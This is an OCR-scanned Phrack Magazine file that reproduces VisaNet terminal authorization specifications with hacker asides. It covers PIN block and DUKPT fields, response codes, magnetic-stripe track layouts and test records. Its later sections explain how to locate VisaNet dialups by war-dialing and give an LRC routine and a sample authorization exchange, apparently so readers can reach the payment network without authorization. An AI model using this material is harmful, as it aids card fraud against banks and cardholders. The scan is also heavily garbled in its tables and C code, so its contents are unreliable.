pp - PIN Block Format Code 


ANSI DES encryption technique was used. 


-— This code describes the PIN block format 


was used by the acquirer. Values are: 
Format is based on the PIN, the PIN length, selected 
rightmost digits of the account number and the pad 

characters "0" and "F"; combined through an exclusive 


Od 


03 
04 - 


"OR" operation. 


Format is based on the PIN, the PIN length and a user 


specified numeric pad character. 


Format is based on the PIN and the "F" pad character. 
Format is the same as "01" except that the leftmost 
account number digits are selected. 


ZZ Zone Key Index 
acquirer to encrypt the PIN block. 


Ol - 
02 = 


First key 
Second key 


00000000 —- Visa Reserved — Must be all zeros 


For additional information, 


Formats, Section B: Field Descriptions. Specifically, 
Personal Identification Number (PIN) Data and Security Related Control 


Information respectively. 


This index points to th 


zone key used by the 


Values are: 


refer to the VisaNet manual V.I.P. System, Message 


fields 52 and 53; 


4.20.3 DUK/PT KEY WI 


When a PIN is entered 


5 


H THIRTY TWO BYTE CARDHOLDER ID 


on a PIN pad supporting DUK/PT technology, the terminal 
will generate the following 32 bytes: 


aaaaaaaaaaaaaaaakkkkkkssssssssss 


Where: 


15.txt 


4.20. 


When Address Verification Servic 
mailing address of the cardholder’s monthly statement. 
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aaaaaaaaaaaaaaaa — Expanded 


Encrypted PIN Block Data - The encrypted 
PIN block format consists of 64 bits of data. 


Since the 


VisaNet Second Generation protocol allows only printable 


characters in data fields, 
ensure that no values 


these 64 bits must be expanded to 
less than hex 
expand the 64 bit encrypted PIN block, 


"20" are transmitted. To 


remove four bits ata 


time and convert them to ANSI X3.4 characters using table 4.20. 


After this conversion, the 64 bit 
consist of 16 characters that will 


encrypted PIN bloc 


k will 
Expanded 


be placed in the 


Encrypted PIN Block Data field. 


kkkkkk Key Set Identifier 


(KSID) 


repetitive? you bet] 


Visa assigned, 


SSSSSSSSSS Expanded TRSM ID 


Is represented by a unique, 
six digit bank identification number. 


(PIN Pad Serial Number) 


Visa 


& Expanded 


Transaction Counter 
two hexadecimal fields. 


transactio 
a total of 21 bits of data. 
together will contain 40 bits. 


Is represented by the concate 


nation of these 


The PIN pad serial number is stored as 
five hex digits minus one bit for a total of 19 bits of data. 


The 


mn counter is stored as five hex digits plus one bit for 
[These two fields concatenated 
Since the VisaNet Second 


Generation protocol allows only printable characters in data 


fields, these 40 bits must b 


nsure that no values 


less than hex "20" 


using table 4.20. 


xpanded to 
are transmitted. 
remove four bits at a time and convert them to ASCII characters 
After this conversion, 


To expand this 40 bit field, 


this 40 bit field will 


consist of 10 characters that will be placed in the Expanded 
TRSM ID & Expanded Transaction Counter Field. 
TABLE 4.20 
PIN Block conversion Table 
HEXADECIMAL ANSI X3.4 
DATA CHARACTER 
0000 0 
0001 1 
0010 2 
0011 3 
0100 4 
0101 5 
0110 6 
0111 7 
1000 8 
1001 9 
1010 A 
1011 B 
1100 Cc 
1101 D 
1110 E 
1111 EF 
4 ADDRESS VERIFICATION SERVICE DESCRIPTION [ah enlightenment ] 


is requested, 


field is: 


Numbers are not spelled out. 


this fiel 


d will contain the 
The format of this 


<street address><apt no.><zip code> 


or 


<post office box number><zipcode> 


("First Street" 


becomes 


"1ST Street", "Second" 


becomes "2ND", etc) "Spaces" are only required between a numeral and the ZIP 
code. For instance: 
1391 ELM STREET 40404 
is equivalent to: 1931ELMSTREET40404 


15.txt Wed Apr 26 09:43:40 2017 16 


P.O. Box 24356 55555 
is not equivalent to P.O.BOX2435655555 


If a field is not available or not applicable, it may be skipped. If nine 
digits are available, the last five digits should always be used to pour more 
sand into the wheels of progress. 


4.21 FIELD SEPARATOR 


The authorization record format specifies the use of the "FS" character.\032 
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==Phrack Magazine== 


Volume Five, Issue Forty-Six, File 16 of 28 


KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKAKKK 


4.22 TRANSACTION AMOUNT 


This is a variable fiel 
amount includes the amount in 4.28, 
must be greater than or equal 


VisaNet Operations (Continued) 


l to field 4. 


ld from three to twelve digits in lengt 
Secondary Amount. Theref 


28. 


h. The transaction 
ore, field 4.22 


The transaction amount is presented by the terminal with an implied decimal 


point. 


For example $.01 woul 


ld be represented in the record as "001". When the 


terminal is used with an authorization system which supports the US dollar as 


the primary currency, 


(9999999). 
support other currencies that require the full twelve-digit f 


4.23 FIELD 


S) 


Prewe2e 


EPARATOR 


the amount field must be limited to seven digits 
] The terminal may be used with authorization system which 


ield. 


The authorization record format specifies the use of the "FS" 


4.24 DEVICE 


CODE/INDUSTRY COD 


EJ] 


This field is used to identify the devic 
and the industry type of the merchant. 
the current codes. 


TABLE 


type which generate 


4.24 


Device Code/Industry Code 


character. 


d the transaction 


Table 4.24 provides a brief summary of 


Cc Cc 

O O 

D D 

E DEVICE TYPE E INDUSTRY TYPE 
0 Unknown or Unsure 0 Unknown or Unsure 

1 RESERVED 1 RESERVED 
2 RESERVED 2 RESERVED 
3 RESERVED 5 RESERVED 
4 RESERVED 4 RESERVED 
5 RESERVED 5 RESERVED 
6 RESERVED 6 RESERVED 
7 RESERVED wi) RESERVED 
8 RESERVED 8 RESERVED 
9 RESERVED 9 RESERVED 
A RESERVED A RESERVED 
B RESERVED B Bank/Financial Institution 
Cc P63 Cc. RESERVED 
D Dial Terminal D RESERVED 
E Electronic Cash Register (ECR) E RESERVED 
F RESERVED F Food/Restaurant 

G RESERVED G Grocery Store/Supermarket 
H RESERVED H Hotel 

rT In-Store Processor I RESERVED 
J RESERVED J RESERVED 
K RESERVED K RESERVED 
L RESERVED L RESERVED 
M Main Frame M Mail Order 

N RESERVED N RESERVED 
O RESERVED O RESERVED 
P POS-port P RESERVED 
Q ESERVED for POS-port QO RESERVED 
R RESERVED R Retail 

Ss RESERVED S RESERVED 
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T RESERVED T RESERVED 
U RESERVED U RESERVED 
V RESERVED V RESERVED 
W RESERVED W RESERVED 
Xx RESERVED Xx RESERVED 
Y RESERVED Y RESERVED 
Z RESERVED Z RESERVED 
4.25 FIELD SEPARATOR 


The authorization record format specifies the use of the "FS" character. 


4.26 ISSUING INSTITUTION ID/RECEIVING INSTITUTION ID 


This six-digit field is provided by the merchant signing member and is present 
when the terminal is used to process transactions which can not be routed using 
the cardholder Primary Account Number. When a value is present in this field, 
it is used as an RIID for all valid transaction codes, field 4.12, except 81 
through 88. This field is used as an IIID for transaction codes 81 through 88. 
Table 4.26 provides a summary of the RIID codes for check acceptance. 


TABLE 4.26 
Check Acceptance RIID Values 


Vendor RIID 
JBS, Inc 810000 
Telecheck 861400 
TeleCredit, West 894300 [note; telecredit has been 
TeleCredit, East 894400 mutated/eaten by equifax] 


4.27 FIELD SEPARATOR 


The authorization record format specifies the use of the "FS" character. 


4.28 SECONDARY AMOUNT (CASHBACK) 


NOTE: "Cashback" is NOT allowed on Visa cards when the Customer Data Field, 
see section 4.18, has been manually entered. 
This is a variable length field from three to twelve digits in length. The 
Secondary Amount is included in field 4.22, Transaction Amount. 


The secondary amount is presented by the terminal with an implied decimal point. 
For example $.01 would be represented in the record as "001". This field will 
contain 000 when no secondary amount has been requested. Therefore, when th 
terminal is used with an authorization system which supports the US dollar as 
the primary currency, the secondary amount field must be limited to seven 
digits (9999999). The terminal may be used with authorization systems which 
support other currencies that require the full twelve-digit field. 


4.29 FIELD SEPARATOR 


The authorization record format specifies the use of the "FS" character. 


4.30 M 


Gl 


RCHANT NAM 


Gl 


This 25-character field contains the merchant name provided by the signing 
member. the name must correspond to the name printed on the customer receipt. 
The name is left justified with space fill. The first character position can 
not be a space. This field must contain the same used in the data capture 
batch. 


4.32 MERCHANT STA 


E 


This two-character field contains the merchant location state abbreviation 
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provided by the singing member. The abbreviation must correspond to the state 
name printed on the customer receipt and be one of the Visa accepted 
abbreviations. This field must contain the same data used in the data capture 
batch. 


4.33 SHARING GROUP 
This one to fourteen-character field contains the group of debit card/network 
types that a terminal may have access to and is provided by the singing member. 
The values must correspond to one of the Visa assigned debit card /network 
types. This data is part of the VisaNet debit data. 


4.34 FIELD SEPARATOR 


The authorization record format specifies the use of the "FS" character. 


Gl 


4.35 MERCHANT ABA NUMBER 


This fixed length field is twelve digits in length. If this field is not used, 
its length must be zero. If this field is not used, the following field must 
also be empty. 


This number identifies the merchant to a debit switch provided by the signing 
member. The number is provided by the signing member. 


4.36 MERCHANT SETTLEMENT AGENT NUMBER 


This fixed length field is four digits in length. If this field is not used, 
its length must be zero. If this field is not used, the previous field must 
also be empty. 


This number identifies the merchant settling agent. The number is provided by 
the signing member. 


4.37 FIELD SEPARATOR 


The authorization record format specifies the use of the "FS" character. 


4.38 AGENT NUMBER 


This six-digit field contains an agent number assigned by the signing member. 
The number identifies an institution which signs merchants as an agent of a 
member. The member uses this number to identify the agent within the member 
systems. The acquirer BIN, Agent, Chain, Merchant, Store, and Terminal numbers 
are required to uniquely identify a terminal within the VisaNet systems. 


4.39 CHAIN NUMBER 


This six-digit field contains a merchant chain identification number assigned 
by the singing member. The member uses this number to identify the merchant 
chain within the member systems. The acquirer BIN, Agent, Chain, Merchant, 
Store, and Terminal numbers are required to uniquely identify a terminal within 
the VisaNet systems. 


4.40 BATCH NUMBER 


This three-digit field contains a batch sequence number generated by the 
terminal. The number will wrap from 999 to 001. This number is that data 
capture batch number. 


4.41 REIMBURSEMENT ATTRIBUT 


E 


This is a single character fixed length field. 
This field contains the reimbursement attribute assigned by the singing member. 
This field must be a "space". 


4.42 FIELD SEPARATOR 
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The authorization record format specifies the use of the "FS" character. 


4.43 APPROVAL COD! 


{3 | 


This contains a six-character fixed length field. 


This field is only present in cancel transactions and contains the original 
approval code from the original transaction. 


The approval code was returned in the authorization response of the transaction 
to be canceled. 


4.44 SETTLEMENT DAT 


E 


This contains a four-digit fixed length field. 


This field is only present in cancel transactions and contains the settlement 
date from the original transaction and is in the format MMDD. 


The settlement date was returned in the authorization response of the 
transaction to be canceled. 


4.45 LOCAL TRANSACTION DAT! 


Gl 


This contains a four-digit fixed length field. 


This field is only present in cancel transactions and contains the transaction 
date from the original transaction and is in the format MMDD. 


The transaction date was returned in the authorization response of the 
transaction to be canceled as MMDDYY. 


4.46 LOCAL TRANSACTION TIME 


[This contains a six-digit fixed length field. 


This field is only present in cancel transactions and contains the transaction 
time from the original transaction and is in the format HHMMSS. 


The transaction time was returned in the authorization response of the 
transaction to be canceled. 


4.47 SYSTEM TRACE AUDIT NUMBER 


This contains a six-character fixed length field. 


This field is only present in cancel transactions and contains the trace audit 
number from the original transaction. 


The trace audit number was returned in the authorization response of the 
transaction to be canceled. 


4.48 ORIGINAL AUTHORIZATION TRANSACTION COD 


Gl 


The field is a two-character fixed length field and must contain the original 
AUTHORIZATION TRANSACTION CODE (filed 4.12) of the transaction to be canceled. 
Currently, the only transaction that can be canceled in an Interlink Debit 

Purchase. 


4.49 NETWORK IDENTIFICATION COD 


GJ 


This contains a single character fixed length field. 


This field is only present in cancel transactions and contains the network ID 
from the original transaction. 


The network ID was returned in the authorization response of the transaction to 
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be canceled. 


4.50 FIELD SEPARATOR 


The authorization record format specifies the use of the "FS" character. 


5.0 RESPONSE RECORD DATA ELEMENT DEFINITIONS 


The following subsections will define the authorization response record data 
elements. 


5.01 PAYMENT SERVICE INDICATOR 


This field contains the one-character payment service indicator. It must be 
placed in the batch detail record for terminals that capture. 


Table 5.01 provides a summary of current Values. 


TABLE 5.01 
Payment Service Indicator Values 


VALUE DESCRIPTION 
A REPS qualified 
Y Requested a "Y" in field 4.14 and there was a problem 
REPS denied (VAS edit error or BASE I reject) 
N Requested an "N" in field 4.14 or requested a "Y" in field 
4.14 and request was downgraded (by VAS) 
space If "Y" sent and transaction not qualified (VAS downgrade) 


5.02 STORE NUMBER 


This four-digit number is returned by VisaNet from the authorization request for 
formats "J" and "G", and can be used to route the response within a store 
controller and/or a store concentrator. 


5.03 TERMINAL NUMBER 


This four-digit number is returned by VisaNet from the authorization request for 
formats "J" and "G", and can be used to route the response within a store 
controller and/or a store concentrator. 


5.04 AUTHORIZATION SOURCE CODE 


This field contains a one-character code that indicates the source of the 
authorization. The received code must be placed in the data capture detail 
transaction record when data capture is enabled. 


Table 5.04 provides a summary of current codes. 


TABLE 5.04 
Authorization Source Codes 


Code Description 

af STIP: time-out respons 

2 LCS: amount below issuer limit 

3 STIP: issuer in Suppress-Inquiry mode 

4 STIP: issuer unavailable 

5 Issuer approval 

6 Off-line approval, POS device generated 

7 Acquirer approval: BASE I unavailable 

8 Acquirer approval of a referral 

9 Use for non-authorized transactions; such as credit card credits [yum!] 
D Referral: authorization code manually keyed 

E Off-line approval: authorization code manually keyed 
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5.05 TRANSACTION SEQUENCE NUMBER 


This field contains the four-digit code which was generated by the terminal as 
the sequence number for the transaction and passed to the authorization center 
in the authorization request record. The sequence number can be used by the 
terminal to match request and response messages. The transaction sequence 
number is returned by VisaNet without sequence verification. 


5.06 RESPONSE CODE 


This field contains a two-character response code indicating the status of the 
authorization. 


Table 5.06 provides the response codes for formats "J" and "G". A response code 
of "00" represents an approval. A response code of "85" represents a successful 
card verification returned by TRANSACTION CODES 58, 68, and 88. All other 
response codes represent a non-approved request. 


The value returned is stored in the batch transaction detail record for 
terminals that capture. 


TABLE 5.06 
Authorization Response Codes For Record Formats "J" & "G" 


Gl 


Authorization Response AVS Result 
Response Messag Code Response Definition Code 

EXACT MATCH 00 Exact Match, 9 digit zip X 
EXACT MATCH 00 Exact Match, 5 digit zip GRIND ¥ 
ADDRESS MATCH 00 Address match only A 
ZIP MATCH 00 9-digit zip match only W 
ZIP MATCH 00 5-digit zip match only GRIND Z 
NO MATCH 00 No address or zip match N 
VER UNAVAILABLE 00 Address unavailable U 
RETRY 00 Issuer system unavailable R 
ERROR INELIGIBLE 00 Not a mail/phone order E 
SERV UNAVAILABLE 00 Service not supported S 

APPROVAL 00 Approved and completed see above 

CARD OK 85 No reason to decline see above 
CALL O01 Refer to issuer 0 
CALL 02 Refer to issue —- Special condition 0 
NO REPLY 28 File is temporarily unavailable 0 
NO REPLY 91 Issuer or switch is unavailable 0 
HOLD-CALL 04 Pick up card 0 
HOLD-CALI O07 Pick up card - Special condition 0 
HOLD-CALL 41 Pick up card - Lost 0 
HOLD-CAL 43 Pick up card -— Stolen 0 
ACCT LENGTH ERR E Verification Error 0 
ALREADY REVERSED 719 Already Reversed at Switch [ya got me] 0 
AMOUNT ERROR 13 Invalid amount 0 
CAN’ T VERIFY PIN 83 Can not verify PIN 0 
CARD NO ERROR 14 Invalid card number 0 
CASHBACK NOT APP 82 Cashback amount not approved 0 
CHECK DIGIT ERR EB Verification Error 0 
CID FORMAT ERROR EC Verification Error 0 
DATE ERROR 80 Invalid Date 0 
DECLINE 05 Do not honor 0 
DECLINE 51 Not Sufficient Funds 0 
DECLINE 61 Exceeds Withdrawal Limit 0 
DECLINE 65 Activity Limit Exceeded 0 
ENCRYPTION ERROR 81 Cryptographic Error 0 
ERROR XxX 06 General Error 0 
ERROR XXXX 06 General Error 0 
EXPIRED CARD 54 Expired Card 0 
INVALID ROUTING 98 Destination Not Found 0 
INVALID TRANS 12 Invalid Transaction 0 
NO CHECK ACCOUNT 52 No Check Account 0 
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NO SAVE ACCOUNT 54 No Save Account 0 
NO SUCH ISSUER 15 No Such Issuer 0 
RE ENTER 19 Re-enter Transaction 0 

SEC VIOLATION 63 Security Violation 0 
SERV NOT ALLOWED 571 Trans. not permitted-Card 0 
SERV NOT ALLOWED 58 Trans. not permitted-Terminal 0 
SERVICE CODE ERR 62 Restricted Card 0 
SYSTEM ERROR 96 System Malfunction [whoop whoop! ] 0 
TERM ID ERROR 03 Invalid Merchant ID 0 
WRONG PIN oj) Incorrect PIN 0 
XXXXXXXXXXXXXXXXXX XX Undefined Respons 0 


5.07 APPROVAL COD 


GJ 


This field contains a six-character code when a transaction has been approved. 
If the transaction is not approved the contents of the field should be ignored. 
The approval code is input to the data capture detail transaction record. 


5.08 LOCAL TRANSACTION DAT 


Gl 


This field contains a six-digit local date calculated (MMDDYY) by the 
authorization center using the time zone differential code provided in the 
authorization request messag This date is used by the terminal as the date to 
be printed on the transaction receipts and audit reports, and as the date input 
to the data capture transaction detail record. This field is only valid for 
approved transactions. 


[J 


5.09 AUTHORIZATION RESPONSE MESSAG 


This field is a sixteen-character field containing a response display message. 
This message is used by the terminal to display the authorization results. 


Table 5.06 provides the message summary. The messages are provided with "sp" 
space fill. This field is mapped to the RESPONSE CODE, field 5.06, for all 
non-AVS transactions and for all DECLINED AVS transactions. For APPROVED AVS 
transactions (response code = "00" or "85"), it is mapped to the AVS RESULT 
CODE, field 5.10. 


[J 


5.10 AVS RESULT COD! 


This one-character field contains the address verification result code. An 
address verification result code is provided for transactions and provides an 
additional indication that the card is being used by the person to which the 
card was issued. The service is only available for mail/phone order 
transactions. 


Table 5.06 provides a summary of the AVS Result Codes. 


An ANSI X3.4 "0" is provided for all non-AVS transactions and all declined 
transactions. 


5.11 TRANSACTION IDENTIFIER 


This numeric field will contain a transaction identifier. The identifier will 
be fifteen-digits in length if the payment service indicator value is an "A" or 
it will be zero in length if the payment service indicator value is not an "A". 
This value is stored in the batch detail record for terminals that capture and 


- 


is mandatory for REPS qualification. 


5.12 FIELD SEPARATOR 


The authorization record format specifies the use of the "FS" character. 


5.13 VALIDATION COD 


GJ 


This alphanumeric field will contain a validation code. The code will contain a 
four-character value if the payment service indicator value is an "A" or it will 
be zero in length if the payment service indicator value is not an "A". This 
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value is stored in the batch detail record for terminals that capture and is 
mandatory for REPS qualification. 


5.14 FIELD SEPARATOR 


The authorization record format specifies the use of the "FS" character. 


5.15 NETWORK IDENTIFICATION COD 


Gl 


This one-character fixed length field contains the identification code of the 
network on which the transaction was authorized. The network ID must be printed 
on the receipt. 


[t] 


5.16 SETTLEM 


NT DAT! 


GJ 


This four-digit fixed length field contains the transaction settlement date 
returned by the authorizing system (MMDD). The settlement date must be printed 
on the receipt. 


5.17 SYSTEM TRACE AUDIT NUMBER 


This six-character fixed length field contains a trace audit number which is 
assigned by the authorizing system. The trace audit number must be printed on 
the receipt. 


5.18 RETRIEVAL REFERENCE NUMBER 


This twelve-character fixed length field contains the transaction retrieval 
reference number returned by the authorizing system. The reference number 
should be printed on the receipt. 


5.19 LOCAL TRANSACTION TIM 


Gl 


This six-digit fixed length field contains the transaction time returned by the 
authorizing system (HHMMSS). The time must be printed on the receipt. 


6.0 CONFIRMATION RECORD DATA ELEMENT DEFINITIONS 


The following subsections define the debit confirmation response record data 
elements. 


6.01 NETWORK IDENTIFICATION COD 


x 
Gl 


This one character fixed length field contains the identification code of the 
network on which the transaction was authorized. The network ID is printed on 
the receipt. 


6.02 SETTLEMENT DATE 


This four-digit fixed length field contains the transaction settlement date 
returned by the authorizing system. 


3 


6.03 SYSTEM TRACE AUDIT NUMBER 


This six-character fixed length field contains the system trace audit number 
which is assigned by the authorizing system. 


7.0 CHARACTER CODE DEFINITIONS 


The following subsections will define the authorization request record character 
set and character sets used for track 1 and track 2 data encoded on the magnetic 
stripes. 


The authorization request records are generated with characters defined by ANSI 
X3.4-1986. The data stored on the cardholder’s card in magnetic or optical form 
must be converted to the ANSI X3.4 character set before transmission to VisaNet. 


Section 7.01 provides track 1 character set definition. Section 7.02 provides 
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track 2 character set definition. Section 7.03 provides the ANSI X3.4-1986 and 
ISO 646 character set definitions. Section 7.04 provides a cross reference 
between the track 1, track 2, and ANSI X3.4 character sets. Section 7.05 
describes the method for generating and checking the Mod 10 Luhn check digit for 
credit card account numbers. Section 7.06 describes the method for generating 
the LRC byte for the authorization request message and for testing the card 
swipe’s LRC byte. Section 7.07 provides sample data for an authorization 
request and response for record format "J" testing. 


The POS device/authorization must perform the following operations on track 
read data before it can be used in an authorization request messag 


1. The LRC must be calculated for the data read from the track and compared 
to the LRC read from the track. The track data is assumed to be read 
without errors when on character parity errors are detected and the 
calculated and read LRC’s match. 


2. The starting sentinel, ending sentinel, and LRC are discarded. 


3. The character codes read from the magnetic stripe must be converted from 
the encoded character set to the set used for the authorization request 
message. The characters encoded on track 1 are six-bit plus parity codes 
and the characters encoded on track 2 are four-bit plus parity codes, with 
the character set used for the request message defined as seven-bit plus 
parity codes. 


All characters read from a track must be converted to the request messag 


character set and transmitted as part of the request. The converted track data 
can not be modified by adding or deleting non-framing characters and must be a 
one-for-one representation of the characters read from the track. [sounds like 


they mean it, eh?] 


7.1 TRACK 1 CHARACTER DEFINITION 


Table 7.01 provides the ISO 7811-2 track 1 character encoding definitions. This 
"standards" format is a SAMPLE guideline for expected credit card track 
encoding; ATM/debit cards may differ. Actual cards may differ [not], whether 
they are Visa cards or any other issuer’s cards. 


Each character is defined by the six-bit codes listed in Table 7.01. 


Track 1 can be encoded with up to 79 characters as shown in Figure 7.01 


SS|FC| PAN|FS| NAME|FS| DATE| DISCRETIONARY DATA |ES|LRC 


LEGEND 
Field Description Length Format 
SS Start Sentinel 1 % 
FC Format Code ("B" for credit cards) 1 A/N 
PAN Primary Account Number 19 max NUM 
FS Field Separator 1 e 
NAME Card Holder Name (See NOTE below) 26 max A/N 
FS Field Separator 1 ~ 
DATE Expiration Date (YYMM) 4 NUM 
Discretionary Data Option Issuer Data (See NOTE below) variable A/N 
ES End Sentinel 1 2 
LRC ongitudinal Redundancy Check 


Total CAN NOT exceed 79 bytes----- > 719 


FIGURE 7.01 
Track 1 Encoding Definition 
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NOTE: 


[The CARD HOLDE 


‘-R NAME 


field can include a 


anda "." as 


The DISCRETIONARY DATA can contai 


the title separator 


Table 7.01 
TABLE 7.01 
Track 

b6 0 0 1 1, 
BIT NUMBER b5 ) 0 1 
b4 b3 b2 bl ROW/COL 0 2 3 
0 0 0 0 0 SP 0 (a) P 
OQ: “Or 206. «L 1 (a) He A Q 
Q: 0 0 2 (a) 2 B R 
OQ. 1@: “deb 3 (c) 3 Cc iS) 
0 1 0 0 4 S$ 4 D a 
O° Ay 20. Lb 5 (3) 5 E U 
0 1 0 6 (a) 6 F V 
Os ST, also il: 7 (a) 7 G W 
0 0 0 8 ( 8 H X 
0 0 1 9 ) 9 I Yi 
0 0 A (a) (a) J Z 
Oo 1 1 B (a) (a) K  (b) 
1 0 O Cc (a) (a) L~ (b) 
1 OO 1 D (a) M_ (b) 
1 0 E - (a) N (%) 
1 F (?) O- (a) 

7.02 TRACK 2 CHARACTER DEFINITION 


Table 7.02 provides the ISO 7811-2 track 2 character encoding definitions. 
xpected credit card track 
Actual cards may differ, 


"standards" 
encoding; ATM/debit 
Visa cards or any ot 


format is a SAMPLE 


guideline for 


10 


WA 


Character Definition 


as the surname separator 


n any of the printable characters from 


(a) These character positions 


are for hardware use only 


(bo) These characters are for 


country use only, not 


international use 


These characters are 
reserved for added 
graphic use [nifty] 


) Start sentinel 
End sentinel 

) Field Separator 
Surname separator 
Title separator 
Space 


PAR|MSB|B5|B4|B3|B2|LSB 


OT 


| |--- Most Significant Bit 


|--- Parity Bit (ODD) 


Read LSB First 


cards may differ. 
her issuer’s cards. 


Each character is defined by the four-bit codes 


This 


listed in Table 7.02. 


[Track 2 can be encoded with up to 40 characters as shown in Figure 7.02. 


whether they ar 


SS | PAN |FS| DATE] DISCRETIONARY DATA |ES|LRC 
LEGEND: 
Field Description Length Format 
SS Start Sentinel 1 OB hex 
PAN Primary Account Number 19 max NUM 
FS Field Separator 1 = 
Discretionary Data Option Issuer Data (See NOTE below) variable A/N 
ES End Sentinel 1 OF hex 
LRC ongitudinal Redundancy Check at 
Total CAN NOT exceed 40 bytes----- > 40 
FIGURE 7.02 
Track 2 Encoding Definition 
NOTE: The PAN and DATE are always numeric. The DISCRETIONARY DATA can be 
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numeric with optional field separators as specified in Table 7.02. 


TABLE 7.02 
Track 2 Character Set 


b4 b3 b2 bil COL (a) These characters are for 
hardware use only 

0 0 0 0 0 0 

0 0 0 1 1 1 (B) Starting Sentinel 

0 0 0 2 2 

0 0 3 3 (D) Field Separator 

0 1 0 0 4 4 

0 1 0 1 5 3) (F) Ending Sentinel 

0 il 0 6 6 

0 1 7 ei 
0 0 0 8 8 
0 0 1 9 9 PAR | MSB | b3 | b2 | LSB 
0 0 A (a) 
0 B (B) | | 
1 0 0 € (a) | |--- Most Significant Bit 
1 0 1 D (D) |--- Parity Bit (ODD) 
1 0 E (a) 
1 EF (F) Read LSB first 

tables 7.03a, 7.03b, and 7.04 deleted... 
If you really need a fucking ascii table that bad go buy a book.] 


section 7.05 - Account Data Luhn Check deleted... 
as being unnecessary obtuse and roundabout in explaining how the check works. 
the routine written by crazed luddite and murdering thug is much clearer. ] 


7.06 CALCULATING AN LRC 


When creating or testing the LRC for the read of the card swipe, the 
authorization request record, the debit confirmation record or the VisaNet 
response record; use the following steps to calculate the LRC: 


1) The value of each bit in the LRC character, excluding the parity bit, is 
defined such that the total count of ONE bits encoded in the corresponding 
bit location of all characters of the data shall be even (this is also known 
as an EXCLUSIVE OR (XOR) operation) 


For card swipes, include the start sentinel, all the data read and 
th nd sentinel. 


For VisaNet protocol messages, begin with the first character past 
the STX, up to and including the ETX. 


2) The LRC characters parity bit is not a parity bit for the individual parity 
bits of the data message, but it only the parity bit for the LRC character 
itself. Calculated as an even parity bit. 


[ 1 list a routine for calculating an LRC o a string later on in the document ] 


7.07 TEST DATA FOR RECORD FORMAT "J" 


The following two sections provide sample data for testing record format "J" 
with the VisaNet dial system. 


7.07.01 TEST DATA FOR A FORMAT "J" AUTHORIZATION REQUEST 


Table 7.07a provides a set of test data for record format "J" authorization 
request. 


TABLE 7.07a 
Test Data For Record Format "J" 
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Test Data Byte # Length Format Field Name 
J 1 He A/N Record Format 
0, 2, or 4 2 1 A/N Application Type 
: 3 1 A/N Message Delimiter 
401205 4-9 6 A/N Acquirer BIN 
123456789012 10-21 12 NUM Merchant Number 
0001 22-25 4 NUM Store Number 
0001 26-29 4 NUM Terminal Number 
5999 30-33 4 NUM Merchant Category Code 
840 34-36 3 NUM Merchant Country Code 
94546 37-41 5 A/N Merchant City Code 
108 42-44 3 NUM Time Zone Differential 
54 45-46 2 A/N Authorization Transaction Code 
12345678 47-54 8 NUM Terminal Identification Number 
Y 55 A/N Payment Service Indicator 
0001 x ~5 6-59 4 NUM Transaction Sequence Number 
@ 60 A/N Cardholder Identification Code 
Diy Hy Ty sor X 61 A/N Account Data Source 
Track or Customer Data Field 
Manual Data 
woe N.A. 1 adhe Field Separator 
0000123 N.A. 0 to 43 A/N Transaction Amount 
tho" N.A. 1 "RS" Field Separator 
ER N.A. 0 or 2 A/N Device Code/Industry code 
ES" N.A. 1 ESM Field Separator 
N.A. 0 or 6 NUM Issuing/Receiving Institution ID 
ESM N.A. 1 yeorohy Field Separator 
000 N.A. 3. ton 12 NUM Secondary Amount (Cashback) 
"ES" N.A. ‘rst Field Separator 
NOTE:* Denotes fields that are returned in the response messag 


7.07.2 RESPONSE MESSAGE 


FOR TEST DATA 


Table 7.07b provides the response message for the test data provided in section 
de Od. Mee 
TABLE 7.07b 
Response Message For Test Data - Record Format "J" 
Test Data Byte # Length Format Field Name 
AG ¥;,.ON5: OT * 1 1 A/N Payment Service Indicator 
"space" 
0001 RO 2=5 4 NUM Store Number 
0001 * 6-9 4 NUM Terminal Number 
5 * 1 dl A/N Authorization Source Code 
0001 coca el 4 NUM Transaction Sequence Number 
00 * 15-16 2 A/N Response Code 
12AB45 * 17-22 6 A/N Approval Code 
111992 * 23-28 6 NUM Transaction Date (MMDDYY) 
AP 29-44 16 A/N Authorization Response Messag 
0, Sp, or "FS" 45 1 A/N AVS Result Code 
*Variable 0 or 15 NUM Transaction Identifier 
"ES "rs" Field Separator 
*Variable 0 or 4 A/N Validation Code 
UES! "ES" Field Separator 
NOTE: * Move to data capture record for VisaNet Central Data Capture (CDC) 


[ section two ] 
[ finding visanet ] 


finding visanet isn’t hard, but it can be tedious. visanet rents time off of 
compuserve and X.25 networks. the compuserve nodes used are not the same 
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as their information service, cis. to identify a visanet dialup after 
connecting, watch for three engq characters and a three second span to hangup. 
if you’ve scanned out a moderate portion of your area code, you probably have a 
few dialups. one idea is to write a short program to dial all the connects you 
have marked as garbage or worthless [ you did keep em, right? ] and wait 

for the proper sequence. X.25 connections should work similarly, but i don’t 
know for sure. read the section on visanet usage for other dialup sources. 


[ section three ] 
[ visanet link level protocol ] 


messages to/from visanet have a standard format: 


stx messag tx ire 


the message portion is the record formats covered in section one. Ire values 
are calculated starting with the first byte of message, going up to and 
including the etx character. heres an algorithm that calculates the lrce for a 
string. note: in order to work with the visanet protocols, append etx to the 
string before calling this function. 


unsigned char func_makelrc(char *buff) 
{ 

tnt) 2:5 

char ch, *p; 


ch = 0; 
pS <buLtt; 


for(;;) f{ 
ch = (ch* (*p)); 
ptt; 
if(! (*p)) 
break; 


} 


return ch; 


} 


for a single authorization exchange, the easiest kind of transaction, the 
sequence goes like this: 


host enq stx-respons CxX=1KEe eot 
term stx-request-etx-lre ack 


<disconnect> 


matching this sequence with test record formats from section one, 7.07, heres 
an ascii representation of a transaction. control characters denoted in <>’s. 
[of course, you wouldn’t really have a carriage return in middle of a message. 
duh. ] this transaction would be for card number 4444111122223333 with an 
expiration date of 04/96. the purchase amount is $1.23. visanet responds with 
an approval code of 12ab45. 


host: <eng> 


term: <stx>J0.401205123456789012000100015999840945461085412345678Y0001@H444411 
1122223333<fs>0496<fs>0000123<fs>ER<fs><fs>000<fs><etx><lrc> 


host: <stx>Y00010001500010012AB45111992APPROVAL 12AB45123456789012345<fs> 
ABCD<fs><etx><lrc> 


term: <ack> 
host: <eot> 
authorizing multiple transactions during one connect session is only slightly 


more complicated. the etx character on all messages sent to visanet are changed 
to etb and the application type is changed from ’0’ to ’2’ [section one 4.02]. 
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instead of responding after a transaction with eot, visanet instead polls the 
terminal again with enq. this continues until the terminal either changes back 
to the single transaction format or issues an eot to the host. 


heres a short list of all control characters used: 


stx: start-of-text, first message framing character signaling message start 


